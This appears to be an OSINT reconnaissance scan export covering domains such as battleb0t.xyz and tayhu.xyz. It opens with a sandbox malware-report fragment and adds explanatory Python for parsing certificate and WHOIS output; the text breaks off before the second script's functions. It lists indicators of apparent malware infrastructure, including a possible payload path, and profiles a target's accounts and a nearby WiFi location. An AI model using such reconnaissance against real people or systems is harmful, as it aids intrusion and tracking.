[%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63]- [targetUID: 00000000-00003868]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00003868]\n "J660SMBF.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\J660SMBF.txt]- [targetUID: 00000000-00003868]\n "imagestore.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\imagestore\\3mt7jhv\\imagestore.dat]- [targetUID: 00000000-00003868]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data 61712 bytes 1 file"- 
Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003576]\n "103621DE9CD5414CC2538780B4B75751" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\103621DE9CD5414CC2538780B4B75751]- [targetUID: 00000000-00003576]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Found decrypted SSL traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET /favicon/site.webmanifest HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nDNT: 1\nHost: kamekititamiko.com\nConnection: Keep-Alive\nAccept-Language: en-US"- [Source: SSL_35.229.48.116]\n\n "HTTP/1.1 200 OK\nAccept-Ranges: bytes\nAge: 0\nCache-Control: public, max-age=0, must-revalidate\nContent-Length: 287\nContent-Type: application/octet-stream\nDate: Thu, 04 Aug 2022 00:25:17 GMT\nEtag: "e6405d573aba92769e697fd5ae94bc9b-ssl"\nServer: Netlify\nStrict-Transport-Security: max-age=31536000\nX-Nf-Request-Id: 01G9K3W1TW651T5NWK91TD1HGM\n\n{\n "name": "",\n "short_name": "",\n "icons": [\n {\n "src": "/android-chrome-96x96.png",\n "sizes": "96x96",\n "type": "image/png"\n }\n ],\n "theme_color": "#ffffff",\n "background_color": "#ffffff",\n "display": "standalone"\n}"- [Source: SSL_35.229.48.116]\n\n "GET /favicon.ico HTTP/1.1\nAccept: */*\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: kamekititamiko.com\nDNT: 1\nConnection: Keep-Alive"- [Source: SSL_35.229.48.116]\n\n "@}c%Av@^sp5xv=}K\n,]U+Dmr33I+\n\\;#s7o2&Tzo{]9k"- [Source: SSL_35.229.48.116]\n\n 
"ru:J{o#i@+)4BTi{o+[S"X=]4W*^!(*&\n75%v7$LF\nh"pW\'"z(V8!6Og\nZ6\'}9r[P4\'>h.\\\'Erfw\n{e9Gw)5{;!AZgi[<"- [Source: SSL_35.229.48.116]\n, " 8?~???y8?( @ `zv| {oTF&}*H~=858/AwL#3@_1*7IbeOG%a$|v&\n])RB!!-[?D&zHA\n4<O.mQ[\nh;_lrK/\'8m*AY/;nMY|?>( @W" ]@[e/Q&)*d"- [Source: SSL_35.229.48.116]\n, "DmNkK;/IwA"2#!dI!^Hz"5go1O\nyT>\'^xh)\ngc"- [Source: SSL_35.229.48.116]\n, "HTTP/ | 35.229.48.116 |
| 2023-05-12 03:08:51 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 34.148.97.121 | 34.148.97.127 |
| 2023-05-12 02:44:28 | Co-Hosted Site - Domain Name | No | DNS Resolver | 2 | 0 | 2 | 0 | None | cloudflaressl.com | sni.cloudflaressl.com |
| 2023-05-12 02:44:21 | SSL Certificate - Issued by | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | C=US,O=DigiCert Inc,CN=DigiCert TLS RSA SHA256 2020 CA1 | 185.199.108.153 |
| 2023-05-12 03:08:55 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 34.74.170.77 | 34.74.170.74 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 6 | 0 | None | referrer-policy: same-origin | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=A6pUH5BrVxAUHCFyEeZi9CXof2Qs7NDG4lIwx2vXWTr3bfLmD6TvAbu9CC5NAPxdf7YdVt%2FA3H1mkzjba6JtFsZlXS70vO%2B%2Fyr5MWISSAsLD5ovFUcdhiD4vPP8ctfc%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:23 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f60726fad1912-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Trello (Category: social)
https://trello.com/ayhu | ayhu |
| 2023-05-12 03:01:38 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.157): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:00:37 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | registrar-abuse@cloudflare.com | Domain Name: CLOUDFLARESSL.COM
Registry Domain ID: 1877752347_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.cloudflare.com
Registrar URL: http://www.cloudflare.com
Updated Date: 2023-03-17T11:06:38Z
Creation Date: 2014-09-27T01:11:37Z
Registry Expiry Date: 2032-09-27T01:11:37Z
Registrar: CloudFlare, Inc.
Registrar IANA ID: 1910
Registrar Abuse Contact Email:
Registrar Abuse Contact Phone:
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: serverDeleteProhibited https://icann.org/epp#serverDeleteProhibited
Domain Status: serverTransferProhibited https://icann.org/epp#serverTransferProhibited
Domain Status: serverUpdateProhibited https://icann.org/epp#serverUpdateProhibited
Name Server: NS1.CLOUDFLARESSL.COM
Name Server: NS2.CLOUDFLARESSL.COM
DNSSEC: signedDelegation
DNSSEC DS Data: 2371 13 2 E6F95480B8B7B40CB784DEFF3DB68992C1A795554748DAB4CCE69FD298BD5F1F
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T02:59:31Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: CLOUDFLARESSL.COM
Registry Domain ID: 1877752347_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.cloudflare.com
Registrar URL: https://www.cloudflare.com
Updated Date: 2023-03-25T07:00:34Z
Creation Date: 2014-09-27T01:11:37Z
Registrar Registration Expiration Date: 2032-09-27T01:11:37Z
Registrar: Cloudflare, Inc.
Registrar IANA ID: 1910
Domain Status: clientdeleteprohibited https://icann.org/epp#clientdeleteprohibited
Domain Status: clienttransferprohibited https://icann.org/epp#clienttransferprohibited
Domain Status: serverdeleteprohibited https://icann.org/epp#serverdeleteprohibited
Domain Status: servertransferprohibited https://icann.org/epp#servertransferprohibited
Domain Status: serverupdateprohibited https://icann.org/epp#serverupdateprohibited
Domain Status: clientupdateprohibited https://icann.org/epp#clientupdateprohibited
Registry Registrant ID:
Registrant Name: DATA REDACTED
Registrant Organization: DATA REDACTED
Registrant Street: DATA REDACTED
Registrant City: DATA REDACTED
Registrant State/Province: CA
Registrant Postal Code: DATA REDACTED
Registrant Country: US
Registrant Phone: DATA REDACTED
Registrant Phone Ext: DATA REDACTED
Registrant Fax: DATA REDACTED
Registrant Fax Ext: DATA REDACTED
Registrant Email: https://domaincontact.cloudflareregistrar.com/cloudflaressl.com
Registry Admin ID:
Admin Name: DATA REDACTED
Admin Organization: DATA REDACTED
Admin Street: DATA REDACTED
Admin City: DATA REDACTED
Admin State/Province: DATA REDACTED
Admin Postal Code: DATA REDACTED
Admin Country: DATA REDACTED
Admin Phone: DATA REDACTED
Admin Phone Ext: DATA REDACTED
Admin Fax: DATA REDACTED
Admin Fax Ext: DATA REDACTED
Admin Email: https://domaincontact.cloudflareregistrar.com/cloudflaressl.com
Registry Tech ID:
Tech Name: DATA REDACTED
Tech Organization: DATA REDACTED
Tech Street: DATA REDACTED
Tech City: DATA REDACTED
Tech State/Province: DATA REDACTED
Tech Postal Code: DATA REDACTED
Tech Country: DATA REDACTED
Tech Phone: DATA REDACTED
Tech Phone Ext: DATA REDACTED
Tech Fax: DATA REDACTED
Tech Fax Ext: DATA REDACTED
Tech Email: https://domaincontact.cloudflareregistrar.com/cloudflaressl.com
Registry Billing ID:
Billing Name: DATA REDACTED
Billing Organization: DATA REDACTED
Billing Street: DATA REDACTED
Billing City: DATA REDACTED
Billing State/Province: DATA REDACTED
Billing Postal Code: DATA REDACTED
Billing Country: DATA REDACTED
Billing Phone: DATA REDACTED
Billing Phone Ext: DATA REDACTED
Billing Fax: DATA REDACTED
Billing Fax Ext: DATA REDACTED
Billing Email: https://domaincontact.cloudflareregistrar.com/cloudflaressl.com
Name Server: ns1.cloudflaressl.com
Name Server: ns2.cloudflaressl.com
DNSSEC: signedDelegation
Registrar Abuse Contact Email: registrar-abuse@cloudflare.com
Registrar Abuse Contact Phone: +1.4153197517
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T02:59:44Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
Cloudflare provides more than 13 million domains with the tools to give their global users a faster, more secure, and more reliable internet experience.
NOTICE:
Data in the Cloudflare Registrar WHOIS database is provided to you by Cloudflare
under the terms and conditions at https://www.cloudflare.com/domain-registration-agreement/
By submitting this query, you agree to abide by these terms.
Register your domain name at https://www.cloudflare.com/registrar/
|
| 2023-05-12 02:54:22 | HTTP Headers | No | Web Spider | 1 | 0 | 2 | 0 | None | {"content-encoding": "gzip", "transfer-encoding": "chunked", "vary": "Accept-Encoding", "server": "nginx", "connection": "keep-alive", "etag": "W/\"64217dc5-156\"", "date": "Fri, 12 May 2023 02:54:22 GMT", "content-type": "text/html"} | http://kekw.battleb0t.xyz/jar |
| 2023-05-12 03:01:49 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 185.199.110.153:80 | 185.199.110.0/24 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | ArcorWirelessLAN3mKh (Net ID: 00:01:E3:57:D5:DD) | 50.1188, 8.6843 |
| 2023-05-12 02:44:26 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
26:cc:7f:01:c6:92:25:78:13:50:9e:48:80:75:15:57
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Google Trust Services LLC, CN=GTS CA 1P5
Validity
Not Before: Mar 23 22:37:05 2023 GMT
Not After : Jun 21 22:37:04 2023 GMT
Subject: CN=*.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:aa:7b:81:42:e7:bb:ef:b8:0c:29:95:16:51:5f:
17:ef:12:01:ea:12:d1:38:f6:d6:ab:de:90:73:55:
a4:af:cb:7c:f7:08:2e:7f:ec:c7:d3:07:5d:b2:f5:
bb:41:e9:04:92:a8:3c:a4:cb:ef:73:55:b5:a9:bc:
5c:d1:be:26:4b:99:f3:8a:57:d8:c7:77:79:1d:0e:
70:31:81:bc:da:4a:73:41:e5:08:81:59:46:c7:d8:
68:74:56:c2:f6:64:23:af:1b:88:8f:72:bd:52:09:
2e:97:9b:f1:a4:cf:09:d8:89:91:91:ca:2e:06:41:
a2:84:ad:0d:6a:df:00:95:f5:ec:e2:1e:49:48:18:
0a:3f:98:fa:06:a5:50:9f:7c:2c:20:19:c1:55:cd:
77:d2:89:47:dd:a9:ee:13:f6:2f:e2:48:87:26:a5:
fd:85:17:06:37:b0:a9:d0:53:b4:4d:e3:4c:ec:0e:
83:60:b2:ad:ad:2d:44:08:30:33:b0:91:f7:b0:f8:
00:7f:d1:49:37:39:19:99:a3:59:5c:dc:4a:a0:c5:
bd:ef:ae:e1:d6:c3:40:3c:f6:35:0e:db:7b:df:4f:
54:c4:bd:f6:3a:2c:2b:ff:c9:5b:e5:d2:e9:69:24:
02:0b:f7:c6:94:a2:a1:ed:73:64:15:f9:25:08:00:
3b:85
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
E7:35:7E:35:FD:7B:BC:32:B5:C0:52:8C:76:D9:7D:F0:37:0A:7A:3D
X509v3 Authority Key Identifier:
keyid:D5:FC:9E:0D:DF:1E:CA:DD:08:97:97:6E:2B:C5:5F:C5:2B:F5:EC:B8
Authority Information Access:
OCSP - URI:http://ocsp.pki.goog/s/gts1p5/X4UdJFi-bqE
CA Issuers - URI:http://pki.goog/repo/certs/gts1p5.der
X509v3 Subject Alternative Name:
DNS:*.battleb0t.xyz, DNS:battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.11129.2.5.3
X509v3 CRL Distribution Points:
Full Name:
URI:http://crls.pki.goog/gts1p5/QCTFvWRh6mE.crl
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
09:9f:cd:b5:43:3b:6a:2f:1d:c9:3b:c0:c8:50:40:4b:85:6c:
a4:67:c0:ea:9c:ed:fa:82:03:5a:15:d9:da:e2:17:9e:f5:4d:
17:b3:27:61:b6:b3:76:a2:5c:3c:dc:1f:ca:d1:cf:2a:8c:c5:
9f:e1:42:b1:ce:4f:6c:8b:d7:5b:5d:4a:1a:37:bf:f7:48:1c:
b0:1e:50:fd:1f:d7:83:b8:62:23:8e:ce:bc:13:38:47:cd:3d:
85:a8:0c:e6:2b:35:45:86:97:06:88:96:8f:aa:84:6c:ae:91:
25:1d:3c:c7:d6:f8:a1:4f:51:5e:ed:a9:fe:6b:22:98:84:a4:
ef:b4:d3:2f:02:db:9e:b8:fb:29:cc:58:62:ad:6f:ac:48:dc:
16:46:0c:14:b4:34:7b:60:f1:ec:27:16:2b:4e:4a:c3:37:36:
d0:34:81:c1:2b:54:8c:d5:17:57:ba:55:4c:71:58:26:4f:c6:
22:b8:65:ba:ad:e7:f5:f2:a8:04:c1:7d:df:11:ab:7d:f5:94:
7d:56:64:8a:41:7f:f4:d3:d7:1a:a0:c6:cc:e6:42:c8:ac:de:
6a:33:c1:21:70:bc:bd:6f:69:08:1f:8f:fa:9f:b7:aa:ca:2e:
e6:b7:8f:15:ac:fb:89:0e:c0:5f:c0:b9:df:e8:c0:15:b9:87:
ca:00:58:c5
|
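The two `openssl x509 -text` dumps on this page (the `*.battleb0t.xyz` one above and the `fluid.battleb0t.xyz` one further down) both carry `CT Precertificate Poison: critical`: they are precertificates pulled from Certificate Transparency logs, which prove that a CA issued for the name but are not the leaf a TLS client would accept, and the poison extension keeps them from being used as one. The Python below is an added example, not SpiderFoot's code or the site's: it parses that text form (whitespace-tolerant, so the flattened dumps on this page parse as well), flags the precertificate, checks validity against the row's own timestamp, and answers which hostnames the SANs actually cover under the one-label wildcard rule. `SAMPLE` is the wildcard dump with the modulus and signature bytes cut out; `SCAN_TIME` is the row's timestamp.

```python
"""Parse `openssl x509 -text` output as dumped in the scan rows and check it.

Added example, not SpiderFoot's code. SAMPLE is the *.battleb0t.xyz dump from
the page with the modulus and signature bytes replaced by "..."; the regexes
are written for openssl's text form, indented or flattened.
"""
import re
from datetime import datetime, timezone

SAMPLE = """Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number:
            26:cc:7f:01:c6:92:25:78:13:50:9e:48:80:75:15:57
        Signature Algorithm: sha256WithRSAEncryption
        Issuer: C=US, O=Google Trust Services LLC, CN=GTS CA 1P5
        Validity
            Not Before: Mar 23 22:37:05 2023 GMT
            Not After : Jun 21 22:37:04 2023 GMT
        Subject: CN=*.battleb0t.xyz
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
                RSA Public-Key: (2048 bit)
                Modulus: ...
                Exponent: 65537 (0x10001)
        X509v3 extensions:
            X509v3 Key Usage: critical
                Digital Signature, Key Encipherment
            X509v3 Extended Key Usage:
                TLS Web Server Authentication
            X509v3 Basic Constraints: critical
                CA:FALSE
            X509v3 Subject Alternative Name:
                DNS:*.battleb0t.xyz, DNS:battleb0t.xyz
            CT Precertificate Poison: critical
                NULL
    Signature Algorithm: sha256WithRSAEncryption
         ...
"""

# Timestamp of the "Internet Name" row that carried this dump.
SCAN_TIME = datetime(2023, 5, 12, 2, 44, 26, tzinfo=timezone.utc)


def _search(pattern, text, default=None):
    m = re.search(pattern, text, re.M)
    return m.group(1).strip() if m else default


def _dn(s):
    # Good enough for the DNs on this page; RDN values containing ", " need a real parser.
    return dict(part.split("=", 1) for part in s.split(", "))


def _time(s):
    # openssl pads single-digit days with a space ("Apr  4 ..."); collapse it first.
    return datetime.strptime(" ".join(s.split()), "%b %d %H:%M:%S %Y GMT").replace(tzinfo=timezone.utc)


def parse_x509_text(text):
    """Turn the human-readable dump into a dict of the fields an analyst checks."""
    not_before = _time(_search(r"Not Before\s*:\s*(.+)$", text))
    not_after = _time(_search(r"Not After\s*:\s*(.+)$", text))
    eku = _search(r"Extended Key Usage:\s*(.+)$", text, "")
    return {
        "serial": _search(r"Serial Number:\s*([0-9a-f:]+)", text),
        "issuer": _dn(_search(r"^\s*Issuer:\s*(.+)$", text)),
        "subject": _dn(_search(r"^\s*Subject:\s*(.+)$", text)),
        "not_before": not_before,
        "not_after": not_after,
        # 89 days 23:59:59 on this cert; rounding gives the nominal 90-day lifetime.
        "lifetime_days": round((not_after - not_before).total_seconds() / 86400),
        "rsa_bits": int(_search(r"RSA Public-Key: \((\d+) bit\)", text, "0")),
        "sans": re.findall(r"DNS:([^,\s]+)", text),
        "eku": [e.strip() for e in eku.split(",") if e.strip()],
        "is_ca": "CA:TRUE" in text,
        # The poison extension marks a CT precertificate: evidence of issuance,
        # never a certificate a TLS client will accept.
        "precertificate": "CT Precertificate Poison" in text,
    }


def valid_at(cert, when):
    return cert["not_before"] <= when <= cert["not_after"]


def name_matches(pattern, host):
    """RFC 6125 6.4.3: a wildcard stands for exactly one non-empty leftmost label."""
    pattern, host = pattern.lower().rstrip("."), host.lower().rstrip(".")
    if not pattern.startswith("*."):
        return pattern == host
    suffix = pattern[1:]  # "*.battleb0t.xyz" -> ".battleb0t.xyz"
    label = host[: -len(suffix)] if host.endswith(suffix) else ""
    return bool(label) and "." not in label


def covers(cert, host):
    return any(name_matches(n, host) for n in cert["sans"])


if __name__ == "__main__":
    cert = parse_x509_text(SAMPLE)
    print("precertificate:", cert["precertificate"], "valid at scan:", valid_at(cert, SCAN_TIME))
    for h in ("kekw.battleb0t.xyz", "battleb0t.xyz", "a.b.battleb0t.xyz"):
        print(h, "covered:", covers(cert, h))
```

The wildcard covers `kekw.battleb0t.xyz` and the second SAN covers the apex, but a two-level name such as `a.b.battleb0t.xyz` is not covered; the CT entry only tells you the CA issued for these names, so the served leaf still has to be fetched to confirm what the host actually presents.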
| 2023-05-12 02:59:45 | Similar Domain - Whois | No | Whois | 1 | 0 | 2 | 0 | None | Domain Name: TAYHU.XYZ
Registry Domain ID: D286586654-CNIC
Registrar WHOIS Server: whois.cloudflare.com
Registrar URL: http://cloudflare.com
Updated Date: 2023-03-07T02:18:07.0Z
Creation Date: 2022-03-31T20:18:56.0Z
Registry Expiry Date: 2024-03-31T23:59:59.0Z
Registrar: Cloudflare, Inc.
Registrar IANA ID: 1910
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registrant Organization:
Registrant State/Province: Hamburg
Registrant Country: DE
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: PRANAB.NS.CLOUDFLARE.COM
Name Server: JOCELYN.NS.CLOUDFLARE.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: registrar-abuse@cloudflare.com
Registrar Abuse Contact Phone: +1.4153197517
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T02:59:45.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain Name: TAYHU.XYZ
Registry Domain ID: D286586654-CNIC
Registrar WHOIS Server: whois.cloudflare.com
Registrar URL: https://www.cloudflare.com
Updated Date: 2023-03-09T21:53:06Z
Creation Date: 2022-03-31T20:18:56Z
Registrar Registration Expiration Date: 2024-03-31T23:59:59Z
Registrar: Cloudflare, Inc.
Registrar IANA ID: 1910
Domain Status: clienttransferprohibited https://icann.org/epp#clienttransferprohibited
Registry Registrant ID:
Registrant Name: DATA REDACTED
Registrant Organization: DATA REDACTED
Registrant Street: DATA REDACTED
Registrant City: DATA REDACTED
Registrant State/Province: Hamburg
Registrant Postal Code: DATA REDACTED
Registrant Country: DE
Registrant Phone: DATA REDACTED
Registrant Phone Ext: DATA REDACTED
Registrant Fax: DATA REDACTED
Registrant Fax Ext: DATA REDACTED
Registrant Email: https://domaincontact.cloudflareregistrar.com/tayhu.xyz
Registry Admin ID:
Admin Name: DATA REDACTED
Admin Organization: DATA REDACTED
Admin Street: DATA REDACTED
Admin City: DATA REDACTED
Admin State/Province: DATA REDACTED
Admin Postal Code: DATA REDACTED
Admin Country: DATA REDACTED
Admin Phone: DATA REDACTED
Admin Phone Ext: DATA REDACTED
Admin Fax: DATA REDACTED
Admin Fax Ext: DATA REDACTED
Admin Email: https://domaincontact.cloudflareregistrar.com/tayhu.xyz
Registry Tech ID:
Tech Name: DATA REDACTED
Tech Organization: DATA REDACTED
Tech Street: DATA REDACTED
Tech City: DATA REDACTED
Tech State/Province: DATA REDACTED
Tech Postal Code: DATA REDACTED
Tech Country: DATA REDACTED
Tech Phone: DATA REDACTED
Tech Phone Ext: DATA REDACTED
Tech Fax: DATA REDACTED
Tech Fax Ext: DATA REDACTED
Tech Email: https://domaincontact.cloudflareregistrar.com/tayhu.xyz
Registry Billing ID:
Billing Name: DATA REDACTED
Billing Organization: DATA REDACTED
Billing Street: DATA REDACTED
Billing City: DATA REDACTED
Billing State/Province: DATA REDACTED
Billing Postal Code: DATA REDACTED
Billing Country: DATA REDACTED
Billing Phone: DATA REDACTED
Billing Phone Ext: DATA REDACTED
Billing Fax: DATA REDACTED
Billing Fax Ext: DATA REDACTED
Billing Email: https://domaincontact.cloudflareregistrar.com/tayhu.xyz
Name Server: jocelyn.ns.cloudflare.com
Name Server: pranab.ns.cloudflare.com
DNSSEC: unsigned
Registrar Abuse Contact Email: registrar-abuse@cloudflare.com
Registrar Abuse Contact Phone: +1.4153197517
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T02:59:45Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
Cloudflare provides more than 13 million domains with the tools to give their global users a faster, more secure, and more reliable internet experience.
NOTICE:
Data in the Cloudflare Registrar WHOIS database is provided to you by Cloudflare
under the terms and conditions at https://www.cloudflare.com/domain-registration-agreement/
By submitting this query, you agree to abide by these terms.
Register your domain name at https://www.cloudflare.com/registrar/
| tayhu.xyz |
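Each Whois row above stores two answers back to back: the thin registry record (VeriSign for cloudflaressl.com, CentralNic for tayhu.xyz) followed by the thick record from the registrar, Cloudflare. The two name the expiry differently (`Registry Expiry Date` versus `Registrar Registration Expiration Date`), repeat `Domain Status` and `Name Server` as separate lines, and for tayhu.xyz disagree on `Updated Date` (2023-03-07 versus 2023-03-09), so a parser has to treat them as two sources rather than one record. The Python below is an added example, not SpiderFoot's code: it parses both halves, derives the signals an OSINT reviewer reads off a Whois record (registration age at scan time, transfer lock, DNSSEC, which contacts are redacted, whether registry and registrar agree on nameservers), and compares the two sources. `REGISTRY` and `REGISTRAR` are excerpts of the tayhu.xyz record above with the terms-of-use text and most of the redacted contact lines dropped; the age buckets are an assumed policy.

```python
"""Parse the paired registry/registrar WHOIS text stored per domain in the scan.

Added example, not SpiderFoot's. REGISTRY and REGISTRAR are excerpts of the
tayhu.xyz record on this page; SCAN_TIME is that row's timestamp; the age
buckets in summarise() are an assumption, not a standard.
"""
from collections import defaultdict
from datetime import datetime, timezone

REGISTRY = """Domain Name: TAYHU.XYZ
Registry Domain ID: D286586654-CNIC
Registrar WHOIS Server: whois.cloudflare.com
Updated Date: 2023-03-07T02:18:07.0Z
Creation Date: 2022-03-31T20:18:56.0Z
Registry Expiry Date: 2024-03-31T23:59:59.0Z
Registrar: Cloudflare, Inc.
Registrar IANA ID: 1910
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registrant Organization:
Registrant State/Province: Hamburg
Registrant Country: DE
Name Server: PRANAB.NS.CLOUDFLARE.COM
Name Server: JOCELYN.NS.CLOUDFLARE.COM
DNSSEC: unsigned
>>> Last update of WHOIS database: 2023-05-12T02:59:45.0Z <<<
"""

REGISTRAR = """Domain Name: TAYHU.XYZ
Registrar WHOIS Server: whois.cloudflare.com
Updated Date: 2023-03-09T21:53:06Z
Creation Date: 2022-03-31T20:18:56Z
Registrar Registration Expiration Date: 2024-03-31T23:59:59Z
Registrar: Cloudflare, Inc.
Domain Status: clienttransferprohibited https://icann.org/epp#clienttransferprohibited
Registrant Name: DATA REDACTED
Registrant Organization: DATA REDACTED
Registrant State/Province: Hamburg
Registrant Country: DE
Registrant Email: https://domaincontact.cloudflareregistrar.com/tayhu.xyz
Admin Name: DATA REDACTED
Tech Name: DATA REDACTED
Name Server: jocelyn.ns.cloudflare.com
Name Server: pranab.ns.cloudflare.com
DNSSEC: unsigned
Registrar Abuse Contact Email: registrar-abuse@cloudflare.com
"""

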